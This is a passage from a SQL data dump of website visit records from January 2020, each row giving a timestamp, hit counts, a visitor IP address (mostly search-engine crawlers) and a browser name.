0,0,'141.8.132.9','other'),(476276,1579456529,1,1,0,0,'51.68.152.26','chrome'),(476277,1579457853,1,0,1,0,'207.46.13.103',''),(476278,1579457909,1,0,1,0,'157.55.39.236',''),(476279,1579460154,1,1,0,0,'8.29.198.25','other'),(476280,1579460791,1,1,0,0,'95.108.181.103','other'),(476281,1579461210,1,1,0,0,'141.8.142.2','chrome'),(476282,1579461570,1,1,0,0,'8.29.198.27','other'),(476283,1579461618,1,0,1,0,'157.55.39.110',''),(476284,1579461881,1,0,1,0,'157.55.39.78',''),(476285,1579463344,1,1,0,0,'178.154.171.127','other'),(476286,1579464444,1,1,0,0,'141.8.183.15','other'),(476287,1579464548,1,1,0,0,'66.249.64.28','chrome'),(476288,1579468109,1,0,1,0,'207.46.13.114',''),(476289,1579468276,1,0,1,0,'207.46.13.58',''),(476290,1579469157,1,1,0,0,'91.209.11.236','other'),(476291,1579469301,1,0,1,0,'207.46.13.87',''),(476292,1579470916,1,1,0,0,'141.8.183.111','other'),(476293,1579471005,1,1,0,0,'8.29.198.26','other'),(476294,1579472410,1,1,0,0,'8.29.198.27','other'),(476295,1579473210,1,1,0,0,'141.8.142.2','other'),(476296,1579473357,2,2,0,0,'178.154.171.134','other'),(476297,1579473482,1,1,0,0,'157.245.58.40','firefox'),(476298,1579474743,1,0,1,0,'157.55.39.237',''),(476299,1579474975,1,1,0,0,'178.154.171.134','other'),(476300,1579476398,2,0,2,0,'207.46.13.38',''),(476301,1579476810,2,2,0,0,'178.154.171.134','other'),(476302,1579477024,1,0,1,0,'207.46.13.204',''),(476303,1579477886,1,1,0,0,'66.249.64.26','chrome'),(476304,1579481715,1,1,0,0,'62.205.134.182','other'),(476305,1579481759,1,0,1,0,'207.46.13.214',''),(476306,1579481863,1,1,0,0,'8.29.198.27','other'),(476307,1579482846,1,1,0,0,'141.8.183.73','other'),(476308,1579483251,1,1,0,0,'8.29.198.25','other'),(476309,1579483545,1,1,0,0,'83.219.136.191','chrome'),(476310,1579483569,1,1,0,0,'178.154.171.134','other'),(476311,1579483677,1,1,0,0,'52.114.77.26','other'),(476312,1579484445,1,1,0,0,'178.154.171.127','other'),(476313,1579484584,1,1,0,0,'178.154.171.134','other'),(476314,1579488561,1,1,0,0,'178.154.171.134','other'),(476315,1579488773,1,1,0,0,'157.55.39.223','other'),(476316,1579489822,1,1,0,0,'178.154.171.134','other'),(476317,1579492277,1,1,0,0,'178.154.171.134','other'),(476318,1579492704,1,1,0,0,'8.29.198.27','other'),(476319,1579494096,1,1,0,0,'8.29.198.27','other'),(476320,1579496747,1,1,0,0,'18.236.209.173','chrome'),(476321,1579496751,1,1,0,0,'52.41.211.72','other'),(476322,1579497760,1,1,0,0,'178.154.171.127','other'),(476323,1579499357,1,1,0,0,'62.205.134.182','other'),(476324,1579500507,1,1,0,0,'207.46.13.62','other'),(476325,1579501365,1,0,1,0,'207.46.13.6',''),(476326,1579501860,1,1,0,0,'91.196.178.76','chrome'),(476327,1579503398,1,1,0,0,'178.154.171.134','other'),(476328,1579503551,1,1,0,0,'8.29.198.26','other'),(476329,1579503636,1,1,0,0,'207.46.13.62','other'),(476330,1579504952,1,1,0,0,'8.29.198.27','other'),(476331,1579505073,1,1,0,0,'178.154.171.127','other'),(476332,1579505167,1,1,0,0,'66.249.64.27','chrome'),(476333,1579505961,1,1,0,0,'176.122.120.58','chrome'),(476334,1579506256,1,1,0,0,'207.46.13.209','other'),(476335,1579506502,1,1,0,0,'178.154.171.127','other'),(476336,1579506504,4,4,0,0,'60.191.38.77','firefox'),(476337,1579507050,1,1,0,0,'178.154.171.134','other'),(476338,1579509196,1,1,0,0,'178.154.171.134','other'),(476339,1579509544,1,1,0,0,'193.17.44.247','chrome'),(476340,1579512010,1,1,0,0,'91.196.177.15','firefox'),(476341,1579512249,1,1,0,0,'66.249.70.62','chrome'),(476342,1579512686,1,1,0,0,'178.154.171.134','other'),(476343,1579512850,1,1,0,0,'34.205.252.69','chrome'),(476344,1579513153,2,2,0,0,'91.196.178.153','chrome'),(476345,1579514385,1,1,0,0,'8.29.198.25','other'),(476346,1579514568,1,1,0,0,'207.46.13.92','other'),(476347,1579515795,1,1,0,0,'8.29.198.26','other'),(476348,1579517747,1,1,0,0,'141.8.132.2','other'),(476349,1579518871,1,1,0,0,'109.74.154.72','chrome'),(476350,1579519346,2,0,2,0,'157.55.39.238',''),(476351,1579520504,1,1,0,0,'157.55.39.155','other'),(476352,1579521059,1,1,0,0,'157.55.39.103','other'),(476353,1579521521,1,1,0,0,'185.143.147.201','other'),(476354,1579522191,1,0,1,0,'207.46.13.217',''),(476355,1579525254,1,1,0,0,'8.29.198.26','other'),(476356,1579526167,1,1,0,0,'66.249.64.26','chrome'),(476357,1579526672,1,1,0,0,'8.29.198.25','other'),(476358,1579527867,1,1,0,0,'91.196.178.30','chrome'),(476359,1579527935,1,1,0,0,'107.178.194.170','chrome'),(476360,1579528224,1,1,0,0,'31.13.127.37','other'),(476361,1579528226,1,1,0,0,'31.13.127.44','other'),(476362,1579528294,1,1,0,0,'31.13.127.32','other'),(476363,1579528295,1,1,0,0,'31.13.127.38','other'),(476364,1579529654,1,1,0,0,'141.8.142.2','other'),(476365,1579529690,2,2,0,0,'91.196.178.76','chrome'),(476366,1579531361,1,0,1,0,'157.55.39.136',''),(476367,1579531709,1,1,0,0,'91.196.178.76','chrome'),(476368,1579533719,1,1,0,0,'66.249.64.26','chrome'),(476369,1579534167,1,1,0,0,'91.196.178.84','firefox'),(476370,1579534475,1,0,1,0,'207.46.13.132',''),(476371,1579534641,1,0,1,0,'207.46.13.183',''),(476372,1579536605,1,1,0,0,'8.29.198.25','other'),(476373,1579537184,3,3,0,0,'66.249.64.27','chrome'),(476374,1579537371,1,1,0,0,'66.249.70.33','chrome'),(476375,1579537379,1,1,0,0,'109.87.165.214','firefox'),(476376,1579537581,1,1,0,0,'8.29.198.25','other'),(476377,1579538998,1,1,0,0,'66.249.70.33','chrome'),(476378,1579539038,1,1,0,0,'66.249.70.62','chrome'),(476379,1579539048,1,1,0,0,'66.249.64.27','chrome'),(476380,1579541964,1,1,0,0,'178.154.171.134','other'),(476381,1579542154,1,1,0,0,'46.109.178.55','chrome'),(476382,1579542704,1,1,0,0,'91.196.178.87','chrome'),(476383,1579543272,1,1,0,0,'141.8.142.2','other'),(476384,1579544100,1,1,0,0,'130.0.37.155','chrome'),(476385,1579546047,1,1,0,0,'64.90.40.245','chrome'),(476386,1579546054,1,1,0,0,'66.249.70.33','chrome'),(476387,1579546073,1,1,0,0,'66.249.70.62','chrome'),(476388,1579547127,1,0,1,0,'207.46.13.56',''),(476389,1579547264,1,1,0,0,'141.8.188.25','other'),(476390,1579547490,2,2,0,0,'91.208.99.2','chrome'),(476391,1579547599,1,1,0,0,'132.148.97.72','chrome'),(476392,1579547665,1,1,0,0,'8.29.198.25','other'),(476393,1579547901,1,1,0,0,'108.167.165.70','chrome'),(476394,1579548495,1,1,0,0,'8.29.198.26','other'),(476395,1579548777,1,1,0,0,'91.124.180.252','chrome'),(476396,1579549446,1,1,0,0,'66.249.64.26','chrome'),(476397,1579549793,1,1,0,0,'91.196.178.30','chrome'),(476398,1579550025,1,1,0,0,'178.154.171.134','other'),(476399,1579551817,1,0,1,0,'66.249.64.27',''),(476400,1579551914,2,2,0,0,'95.213.141.126','opera'),(476401,1579552394,1,0,1,0,'66.249.70.36',''),(476402,1579552506,1,1,0,0,'178.154.171.134','other'),(476403,1579552908,3,3,0,0,'51.68.11.215','chrome'),(476404,1579553218,1,1,0,0,'93.175.11.63','chrome'),(476405,1579553405,2,0,2,0,'157.55.39.74',''),(476406,1579553784,1,1,0,0,'66.249.64.26','chrome'),(476407,1579553828,1,1,0,0,'178.159.37.88','chrome'),(476408,1579553975,1,1,0,0,'178.154.171.134','other'),(476409,1579554223,1,1,0,0,'31.13.127.1','other'),(476410,1579554225,1,1,0,0,'31.13.127.8','other'),(476411,1579554252,2,2,0,0,'51.68.11.211','chrome'),(476412,1579558032,3,3,0,0,'199.116.78.156','chrome'),(476413,1579558379,1,1,0,0,'51.68.11.227','chrome'),(476414,1579558582,1,1,0,0,'8.29.198.27','other'),(476415,1579559354,1,0,1,0,'157.55.39.243',''),(476416,1579559368,1,1,0,0,'8.29.198.26','other'),(476417,1579560632,2,2,0,0,'51.38.53.70','chrome'),(476418,1579563235,1,0,1,0,'157.55.39.243',''),(476419,1579563672,1,1,0,0,'173.231.223.112','chrome'),(476420,1579565353,1,1,0,0,'162.241.24.98','chrome'),(476421,1579566115,1,1,0,0,'157.55.39.149','other'),(476422,1579567026,1,1,0,0,'178.154.171.134','other'),(476423,1579567198,1,1,0,0,'78.106.161.194','other'),(476424,1579567847,3,3,0,0,'51.68.11.207','chrome'),(476425,1579568113,1,1,0,0,'62.205.134.182','other'),(476426,1579568726,1,0,1,0,'157.55.39.91',''),(476427,1579569348,1,1,0,0,'178.154.171.134','other'),(476428,1579569480,1,1,0,0,'8.29.198.25','other'),(476429,1579570198,1,0,1,0,'207.46.13.123',''),(476430,1579570264,1,1,0,0,'8.29.198.26','other'),(476431,1579572472,1,0,1,0,'157.55.39.111',''),(476432,1579572750,1,0,1,0,'157.55.39.234',''),(476433,1579574497,1,0,1,0,'157.55.39.234',''),(476434,1579575003,1,0,1,0,'157.55.39.173',''),(476435,1579575473,1,1,0,0,'178.154.171.134','other'),(476436,1579577726,1,1,0,0,'54.191.119.24','chrome'),(476437,1579577729,1,1,0,0,'35.162.70.167','other'),(476438,1579577875,1,0,1,0,'157.55.39.226',''),(476439,1579580397,1,1,0,0,'8.29.198.26','other'),(476440,1579580461,1,1,0,0,'207.46.13.197','other'),(476441,1579581131,1,1,0,0,'8.29.198.25','other'),(476442,1579584207,1,1,0,0,'207.46.13.253','other'),(476443,1579584505,2,2,0,0,'207.46.13.197','other'),(476444,1579585393,1,1,0,0,'62.205.134.182','other'),(476445,1579585406,2,2,0,0,'157.55.39.90','other'),(476446,1579585955,1,1,0,0,'207.46.13.253','other'),(476447,1579586530,1,1,0,0,'91.196.178.108','chrome'),(476448,1579587157,1,1,0,0,'157.55.39.249','other'),(476449,1579587332,2,2,0,0,'91.196.178.73','chrome'),(476450,1579588109,2,2,0,0,'91.196.178.76','chrome'),(476451,1579589111,1,1,0,0,'91.196.178.76','chrome'),(476452,1579589655,1,1,0,0,'18.197.53.120','firefox'),(476453,1579589737,1,1,0,0,'66.249.64.27','chrome'),(476454,1579589792,1,1,0,0,'31.13.127.17','other'),(476455,1579589793,1,1,0,0,'31.13.127.22','other'),(476456,1579589841,1,1,0,0,'31.13.127.1','other'),(476457,1579589844,1,1,0,0,'173.252.87.50','other'),(476458,1579589928,1,0,1,0,'66.249.64.26',''),(476459,1579590400,1,1,0,0,'178.92.75.71','chrome'),(476460,1579590500,1,1,0,0,'66.249.64.26','chrome'),(476461,1579590612,2,2,0,0,'88.154.61.92','chrome'),(476462,1579590694,1,1,0,0,'31.13.127.14','other'),(476463,1579591307,2,2,0,0,'8.29.198.27','other'),(476464,1579591370,1,1,0,0,'46.201.175.66','chrome'),(476465,1579592422,1,1,0,0,'77.52.193.126','chrome'),(476466,1579592857,1,1,0,0,'66.249.64.26','chrome'),(476467,1579593003,1,1,0,0,'31.13.127.14','other'),(476468,1579593453,1,1,0,0,'178.92.75.71','chrome'),(476469,1579593509,1,1,0,0,'31.13.115.23','other'),(476470,1579594211,1,1,0,0,'157.55.39.154','other'),(476471,1579594398,1,1,0,0,'91.196.178.73','chrome'),(476472,1579594667,1,1,0,0,'178.154.171.127','other'),(476473,1579594773,1,1,0,0,'141.8.132.19','other'),(476474,1579595103,2,2,0,0,'91.196.178.165','chrome'),(476475,1579595867,1,1,0,0,'213.108.44.26','chrome'),(476476,1579596266,1,1,0,0,'88.102.89.50','chrome'),(476477,1579596289,1,1,0,0,'3.120.37.71','firefox'),(476478,1579596443,2,2,0,0,'178.154.171.134','other'),(476479,1579596568,1,1,0,0,'178.133.92.47','chrome'),(476480,1579596863,1,1,0,0,'92.112.119.138','chrome'),(476481,1579597020,1,1,0,0,'178.154.171.127','other'),(476482,1579598166,1,1,0,0,'178.154.171.134','other'),(476483,1579598358,1,1,0,0,'178.92.75.71','chrome'),(476484,1579600017,2,2,0,0,'91.196.178.165','chrome'),(476485,1579601787,1,1,0,0,'66.249.64.26','chrome'),(476486,1579601929,1,1,0,0,'66.249.64.27','chrome'),(476487,1579601966,1,1,0,0,'195.211.175.163','chrome'),(476488,1579602201,1,1,0,0,'8.29.198.27','other'),(476489,1579602325,1,1,0,0,'34.206.52.119','chrome'),(476490,1579602921,1,1,0,0,'8.29.198.26','other'),(476491,1579603116,1,1,0,0,'91.196.178.165','chrome'),(476492,1579603208,2,2,0,0,'37.53.126.129','chrome'),(476493,1579603855,1,1,0,0,'178.154.171.134','other'),(476494,1579605186,1,1,0,0,'94.153.192.46','firefox'),(476495,1579605989,1,1,0,0,'207.46.13.207','other'),(476496,1579606030,1,1,0,0,'109.74.154.72','chrome'),(476497,1579607152,1,1,0,0,'178.154.171.127','other'),(476498,1579607421,1,1,0,0,'31.13.127.4','other'),(476499,1579607422,1,1,0,0,'31.13.127.19','other'),(476502,1579607823,1,1,0,0,'66.249.89.27','other'),(476503,1579608825,1,1,0,0,'91.196.178.165','chrome'),(476504,1579609676,1,1,0,0,'178.154.171.134','other'),(476505,1579612194,1,1,0,0,'91.196.178.93','chrome'),(476506,1579612738,1,0,1,0,'207.46.13.13',''),(476507,1579613005,1,0,1,0,'207.46.13.63',''),(476508,1579613129,1,1,0,0,'8.29.198.26','other'),(476509,1579613212,1,1,0,0,'91.196.178.165','chrome'),(476510,1579613274,1,1,0,0,'91.196.178.107','chrome'),(476511,1579613881,1,1,0,0,'8.29.198.25','other'),(476512,1579614720,1,1,0,0,'66.249.64.26','chrome'),(476513,1579616101,2,2,0,0,'178.154.171.134','other'),(476514,1579616319,1,1,0,0,'157.55.39.211','other'),(476515,1579620241,1,1,0,0,'157.55.39.211','other'),(476516,1579620540,1,1,0,0,'178.154.171.127','other'),(476517,1579620625,1,1,0,0,'178.154.171.134','other'),(476518,1579620693,1,1,0,0,'91.196.178.165','chrome'),(476519,1579621232,2,2,0,0,'195.64.155.151','firefox'),(476520,1579621234,1,1,0,0,'195.64.155.151','chrome'),(476521,1579624046,2,2,0,0,'8.29.198.26','other'),(476522,1579624330,1,1,0,0,'178.154.171.134','other'),(476523,1579625578,1,1,0,0,'141.8.142.2','other'),(476524,1579626298,1,1,0,0,'91.196.178.83','firefox'),(476525,1579626354,1,1,0,0,'91.196.178.177','chrome'),(476526,1579626769,1,1,0,0,'91.196.178.90','chrome'),(476527,1579626837,1,1,0,0,'91.196.178.134','firefox'),(476528,1579627787,3,3,0,0,'31.13.127.13','other'),(476529,1579627788,3,3,0,0,'31.13.127.4','other'),(476532,1579629762,1,1,0,0,'157.55.39.157','other'),(476533,1579633781,2,2,0,0,'178.154.171.134','other'),(476534,1579633942,1,1,0,0,'46.211.155.191','chrome'),(476535,1579634986,2,2,0,0,'8.29.198.26','other'),(476536,1579635639,1,1,0,0,'141.8.142.50','other'),(476537,1579635658,1,1,0,0,'91.226.212.32','firefox'),(476538,1579635663,2,2,0,0,'195.64.154.196','firefox'),(476539,1579635664,1,1,0,0,'176.103.51.29','firefox'),(476540,1579635666,1,1,0,0,'195.64.154.196','chrome'),(476542,1579635719,1,1,0,0,'141.8.132.37','other'),(476543,1579636040,1,1,0,0,'66.249.64.27','chrome'),(476544,1579636254,2,2,0,0,'178.154.171.134','other'),(476545,1579636538,1,1,0,0,'31.13.127.12','other'),(476546,1579636539,1,1,0,0,'31.13.127.19','other'),(476547,1579637284,1,1,0,0,'194.247.173.1','chrome'),(476548,1579638193,1,1,0,0,'37.53.229.135','chrome'),(476549,1579638237,1,1,0,0,'66.249.89.26','other'),(476550,1579638690,1,1,0,0,'178.154.171.134','other'),(476551,1579639507,1,1,0,0,'87.250.224.90','other'),(476552,1579639804,1,1,0,0,'178.133.65.138','chrome'),(476553,1579640613,1,1,0,0,'141.8.142.164','other'),(476554,1579640670,1,1,0,0,'130.180.218.169','chrome'),(476555,1579641576,1,1,0,0,'130.180.218.169','chrome'),(476556,1579641816,1,1,0,0,'178.154.171.134','other'),(476557,1579641857,1,1,0,0,'178.154.171.127','other'),(476558,1579642085,1,1,0,0,'91.196.178.30','chrome'),(476559,1579643593,2,2,0,0,'178.154.171.134','other'),(476560,1579645802,1,1,0,0,'157.55.39.64','other'),(476561,1579645812,1,1,0,0,'178.154.171.134','other'),(476562,1579645915,1,1,0,0,'8.29.198.25','other'),(476563,1579646321,1,1,0,0,'31.13.115.1','other'),(476564,1579646628,1,1,0,0,'8.29.198.27','other'),(476565,1579647909,1,1,0,0,'141.8.183.73','chrome'),(476566,1579648236,1,1,0,0,'37.9.113.177','other'),(476567,1579648676,1,1,0,0,'178.154.171.127','other'),(476568,1579649265,1,1,0,0,'117.1.181.15','chrome'),(476569,1579650667,1,1,0,0,'178.154.171.134','other'),(476570,1579654372,1,1,0,0,'178.154.171.134','other'),(476571,1579654514,1,1,0,0,'62.205.134.182','other'),(476572,1579656839,1,0,1,0,'207.46.13.130',''),(476573,1579656865,2,2,0,0,'8.29.198.26','other'),(476574,1579657692,1,1,0,0,'66.249.64.26','chrome'),(476575,1579657885,1,1,0,0,'66.249.64.27','chrome'),(476576,1579658530,1,1,0,0,'64.246.161.42','firefox'),(476577,1579659806,34,34,0,0,'64.225.40.132','firefox'),(476578,1579659893,1,0,1,0,'157.55.39.209',''),(476579,1579660242,1,1,0,0,'207.46.13.241','other'),(476580,1579660569,1,1,0,0,'207.46.13.16','other'),(476581,1579660746,2,0,2,0,'207.46.13.182',''),(476582,1579661203,1,1,0,0,'178.154.171.134','other'),(476583,1579662071,1,1,0,0,'178.154.171.127','other'),(476584,1579662699,1,1,0,0,'157.55.39.173','other'),(476585,1579662973,3,3,0,0,'157.55.39.222','other'),(476586,1579666414,7,7,0,0,'192.227.152.122','other'),(476587,1579667760,1,1,0,0,'178.154.171.127','other'),(476588,1579667781,1,1,0,0,'8.29.198.26','other'),(476589,1579668406,1,1,0,0,'8.29.198.27','other'),(476590,1579668732,1,1,0,0,'141.8.132.28','other'),(476591,1579671790,1,1,0,0,'91.196.178.143','firefox'),(476592,1579671801,1,1,0,0,'62.205.134.182','other'),(476593,1579672641,1,1,0,0,'178.154.171.134','other'),(476594,1579673075,1,1,0,0,'66.249.64.26','chrome'),(476595,1579673535,1,1,0,0,'52.38.128.59','chrome'),(476596,1579673539,1,1,0,0,'52.34.24.33','other'),(476597,1579674695,3,3,0,0,'206.189.92.18','firefox'),(476598,1579674702,1,1,0,0,'178.154.171.134','other'),(476599,1579675221,1,1,0,0,'91.196.178.76','chrome'),(476600,1579675748,1,1,0,0,'178.154.171.134','other'),(476601,1579676083,1,1,0,0,'91.196.178.165','chrome'),(476602,1579676945,2,2,0,0,'178.154.171.134','other'),(476603,1579677203,1,1,0,0,'157.55.39.194','other'),(476604,1579678173,1,1,0,0,'178.154.171.134','other'),(476605,1579678605,1,1,0,0,'91.196.178.76','chrome'),(476606,1579678695,1,1,0,0,'8.29.198.25','other'),(476607,1579679273,1,1,0,0,'8.29.198.27','other'),(476608,1579679760,1,1,0,0,'92.113.127.39','chrome'),(476609,1579679843,1,1,0,0,'66.249.64.27','chrome'),(476610,1579680382,1,1,0,0,'69.171.251.34','other'),(476611,1579680383,1,1,0,0,'69.171.251.24','other'),(476612,1579680408,1,1,0,0,'178.154.171.134','other'),(476613,1579680434,1,1,0,0,'178.154.171.127','other'),(476614,1579681702,1,1,0,0,'207.46.13.23','other'),(476615,1579682051,1,1,0,0,'217.117.75.168','firefox'),(476616,1579682180,1,1,0,0,'217.117.75.167','firefox'),(476617,1579682268,1,1,0,0,'66.249.64.26','chrome'),(476618,1579683356,1,1,0,0,'66.249.64.26','chrome'),(476619,1579683682,3,3,0,0,'206.189.92.18','firefox'),(476620,1579687142,1,1,0,0,'66.249.89.26','other'),(476621,1579688150,1,1,0,0,'178.154.171.134','other'),(476622,1579688276,1,1,0,0,'5.61.57.242','firefox'),(476623,1579688390,1,1,0,0,'3.17.167.88','chrome'),(476624,1579688490,1,1,0,0,'66.249.64.27','chrome'),(476625,1579689481,1,1,0,0,'37.53.122.100','firefox'),(476626,1579689614,1,1,0,0,'8.29.198.27','other'),(476627,1579690186,1,1,0,0,'8.29.198.25','other'),(476628,1579690369,1,1,0,0,'66.249.64.28','chrome'),(476629,1579690512,2,2,0,0,'95.213.141.126','opera'),(476630,1579691951,1,1,0,0,'109.74.154.72','chrome'),(476631,1579693319,1,1,0,0,'91.196.178.89','firefox'),(476632,1579695628,1,1,0,0,'193.17.44.247','chrome'),(476633,1579695862,1,1,0,0,'46.211.134.236','chrome'),(476634,1579697810,1,1,0,0,'66.249.64.28','chrome'),(476635,1579699362,1,1,0,0,'66.249.64.26','chrome'),(476636,1579700375,1,1,0,0,'37.9.113.177','other'),(476637,1579700527,1,1,0,0,'8.29.198.27','other'),(476638,1579700909,1,1,0,0,'91.196.178.76','chrome'),(476639,1579701106,1,1,0,0,'8.29.198.26','other'),(476640,1579701148,1,1,0,0,'66.249.64.26','chrome'),(476641,1579701335,1,1,0,0,'178.251.109.170','chrome'),(476642,1579701474,1,1,0,0,'91.196.178.81','chrome'),(476643,1579701649,1,1,0,0,'66.249.64.27','chrome'),(476644,1579702516,1,1,0,0,'141.8.183.111','other'),(476645,1579702947,1,1,0,0,'141.8.183.33','other'),(476646,1579703626,1,1,0,0,'87.250.224.90','other'),(476647,1579703762,1,1,0,0,'95.132.0.136','chrome'),(476648,1579704089,1,1,0,0,'91.196.178.182','chrome'),(476649,1579704508,1,1,0,0,'66.249.70.36','chrome'),(476650,1579704719,1,1,0,0,'31.13.127.19','other'),(476651,1579704720,1,1,0,0,'31.13.127.10','other'),(476652,1579705033,1,1,0,0,'141.8.142.2','other'),(476653,1579706237,1,1,0,0,'141.8.132.37','other'),(476654,1579707784,1,1,0,0,'85.187.68.122','chrome'),(476655,1579708380,1,1,0,0,'91.196.178.182','chrome'),(476656,1579709493,1,1,0,0,'207.46.13.242','other'),(476657,1579709904,1,1,0,0,'3.136.116.116','chrome'),(476658,1579710657,1,1,0,0,'206.189.92.18','firefox'),(476659,1579710776,1,1,0,0,'207.46.13.242','other'),(476660,1579711519,2,2,0,0,'8.29.198.26','other'),(476661,1579711599,1,1,0,0,'66.249.64.27','chrome'),(476662,1579712973,1,1,0,0,'91.196.178.3','chrome'),(476663,1579713157,1,1,0,0,'46.211.133.173','chrome'),(476664,1579713721,1,1,0,0,'66.249.64.28','chrome'),(476665,1579714792,1,1,0,0,'91.196.178.73','firefox'),(476666,1579715455,1,1,0,0,'91.196.178.58','chrome'),(476667,1579715483,1,1,0,0,'31.13.127.14','other'),(476668,1579716682,4,4,0,0,'5.9.97.200','other'),(476669,1579718790,1,1,0,0,'66.249.70.62','chrome'),(476670,1579718851,1,1,0,0,'66.249.64.26','chrome'),(476671,1579719804,1,0,1,0,'157.55.39.243',''),(476672,1579720180,1,1,0,0,'46.133.117.243','chrome'),(476673,1579720862,1,1,0,0,'209.17.96.82','other'),(476674,1579721037,1,1,0,0,'31.13.115.2','other'),(476675,1579721574,12,12,0,0,'34.204.200.74','other'),(476676,1579722506,1,1,0,0,'8.29.198.25','other'),(476677,1579722532,9,9,0,0,'34.204.200.74','other'),(476678,1579722963,1,1,0,0,'8.29.198.26','other'),(476679,1579723598,5,5,0,0,'34.204.200.74','other'),(476680,1579723765,1,1,0,0,'31.13.127.14','other'),(476681,1579723766,1,1,0,0,'31.13.127.22','other'),(476682,1579723807,1,1,0,0,'178.154.171.7','other'),(476683,1579724028,1,1,0,0,'37.9.113.177','other'),(476684,1579724501,4,4,0,0,'34.204.200.74','other'),(476685,1579725069,1,1,0,0,'209.17.96.146','other'),(476686,1579725080,1,1,0,0,'88.154.78.119','chrome'),(476687,1579725252,1,1,0,0,'37.52.16.66','chrome'),(476688,1579725521,7,7,0,0,'34.204.200.74','other'),(476689,1579725741,1,0,1,0,'207.46.13.113',''),(476690,1579726654,2,2,0,0,'34.204.200.74','other'),(476691,1579727213,1,1,0,0,'91.196.178.3','chrome'),(476692,1579727809,4,4,0,0,'34.204.200.74','other'),(476693,1579729028,5,5,0,0,'34.204.200.74','other'),(476694,1579730151,1,1,0,0,'37.9.113.177','other'),(476695,1579732562,1,1,0,0,'66.249.89.26','other'),(476696,1579733463,2,2,0,0,'8.29.198.27','other'),(476697,1579734147,1,1,0,0,'141.8.183.100','other'),(476698,1579736926,1,1,0,0,'37.9.113.202','other'),(476699,1579740014,1,1,0,0,'78.47.228.112','chrome'),(476700,1579740913,1,1,0,0,'62.205.134.182','other'),(476701,1579740920,1,1,0,0,'66.249.70.36','chrome'),(476702,1579741052,1,0,1,0,'157.55.39.170',''),(476703,1579743734,1,1,0,0,'207.46.13.185','other'),(476704,1579743787,1,1,0,0,'66.249.64.26','chrome'),(476705,1579744005,1,1,0,0,'87.250.224.90','other'),(476706,1579744169,1,1,0,0,'141.8.132.19','other'),(476707,1579744396,1,1,0,0,'8.29.198.25','other'),(476708,1579744818,1,1,0,0,'8.29.198.26','other'),(476709,1579745299,1,1,0,0,'178.154.171.127','other'),(476710,1579745416,1,1,0,0,'66.249.64.28','chrome'),(476711,1579746910,2,0,2,0,'207.46.13.185',''),(476712,1579747382,1,1,0,0,'207.46.13.185','other'),(476713,1579747686,1,1,0,0,'37.9.113.202','other'),(476714,1579749348,1,1,0,0,'207.46.13.194','other'),(476715,1579751036,1,1,0,0,'35.165.191.244','chrome'),(476716,1579751039,1,1,0,0,'52.41.211.72','other'),(476717,1579752253,1,1,0,0,'141.8.142.164','other'),(476718,1579752263,1,1,0,0,'141.8.188.12','other'),(476719,1579752745,1,1,0,0,'207.46.13.194','other'),(476720,1579755349,1,1,0,0,'8.29.198.25','other'),(476721,1579755723,1,1,0,0,'8.29.198.27','other'),(476722,1579756796,1,1,0,0,'37.9.113.202','other'),(476723,1579758071,1,0,1,0,'66.249.70.62',''),(476724,1579758217,1,1,0,0,'62.205.134.182','other'),(476725,1579758250,1,1,0,0,'31.13.115.10','other'),(476726,1579758251,1,1,0,0,'31.13.115.20','other'),(476727,1579758771,1,1,0,0,'51.68.152.26','chrome'),(476728,1579759795,1,1,0,0,'207.46.13.194','other'),(476729,1579760276,1,1,0,0,'66.249.64.26','chrome'),(476730,1579760612,1,1,0,0,'141.8.132.37','other'),(476731,1579762775,1,1,0,0,'5.255.253.8','other'),(476732,1579762786,1,1,0,0,'95.108.213.39','other'),(476733,1579763885,1,1,0,0,'91.196.177.46','chrome'),(476734,1579765125,1,1,0,0,'178.154.171.7','other'),(476735,1579765189,1,1,0,0,'141.8.132.37','other'),(476736,1579765250,1,1,0,0,'66.249.64.27','chrome'),(476737,1579765388,2,2,0,0,'207.46.13.194','other'),(476738,1579765660,1,1,0,0,'157.55.39.189','other'),(476739,1579766291,1,1,0,0,'8.29.198.27','other'),(476740,1579766438,2,2,0,0,'141.8.142.119','other'),(476741,1579766479,1,1,0,0,'5.45.207.49','other'),(476742,1579766636,1,1,0,0,'8.29.198.25','other'),(476743,1579766916,1,1,0,0,'91.196.177.46','chrome'),(476744,1579767358,1,1,0,0,'91.196.178.123','chrome'),(476745,1579767411,1,1,0,0,'66.249.64.28','chrome'),(476746,1579767674,1,1,0,0,'141.8.142.115','other'),(476747,1579767879,1,1,0,0,'178.92.156.229','chrome'),(476748,1579768022,1,1,0,0,'157.55.39.189','other'),(476749,1579768788,1,1,0,0,'141.8.183.15','other'),(476750,1579769043,1,1,0,0,'54.208.102.37','other'),(476751,1579769045,1,1,0,0,'107.21.1.8','other'),(476752,1579769976,1,1,0,0,'95.108.213.3','other'),(476753,1579770649,1,1,0,0,'212.113.43.134','chrome'),(476754,1579771279,1,1,0,0,'141.8.142.2','other'),(476755,1579771410,1,1,0,0,'92.63.111.27','msie'),(476756,1579771824,1,1,0,0,'212.113.43.134','chrome'),(476757,1579772090,1,1,0,0,'18.191.213.174','chrome'),(476758,1579773477,1,1,0,0,'212.113.43.134','chrome'),(476759,1579773764,1,1,0,0,'91.196.178.175','chrome'),(476760,1579774425,1,1,0,0,'212.113.43.134','chrome'),(476761,1579774781,1,1,0,0,'37.9.113.142','other'),(476762,1579775843,1,1,0,0,'95.108.213.39','other'),(476763,1579776938,1,1,0,0,'95.108.213.61','other'),(476764,1579777223,1,1,0,0,'8.29.198.25','other'),(476765,1579777518,1,1,0,0,'91.196.178.179','chrome'),(476766,1579777549,1,1,0,0,'8.29.198.26','other'),(476767,1579778623,1,1,0,0,'66.249.64.26','chrome'),(476768,1579779025,1,1,0,0,'109.74.154.72','chrome'),(476769,1579779052,2,0,2,0,'207.46.13.107',''),(476770,1579779089,1,1,0,0,'157.55.39.125','other'),(476771,1579779276,1,1,0,0,'13.66.139.0','other'),(476772,1579779412,1,1,0,0,'95.108.213.61','other'),(476773,1579780360,2,2,0,0,'207.46.13.194','other'),(476774,1579780687,1,1,0,0,'141.8.142.115','other'),(476775,1579780698,1,1,0,0,'37.9.113.33','other'),(476776,1579780744,1,1,0,0,'141.8.188.39','other'),(476777,1579781800,1,1,0,0,'66.249.64.26','chrome'),(476778,1579782650,1,1,0,0,'157.55.39.189','other'),(476779,1579784405,1,1,0,0,'141.8.142.119','other'),(476780,1579785024,1,1,0,0,'13.66.139.0','other'),(476781,1579785138,1,1,0,0,'66.249.64.27','chrome'),(476782,1579786505,2,2,0,0,'157.55.39.239','other'),(476783,1579788178,1,1,0,0,'5.255.253.8','other'),(476784,1579788287,1,1,0,0,'8.29.198.25','other'),(476785,1579788518,1,1,0,0,'8.29.198.26','other'),(476786,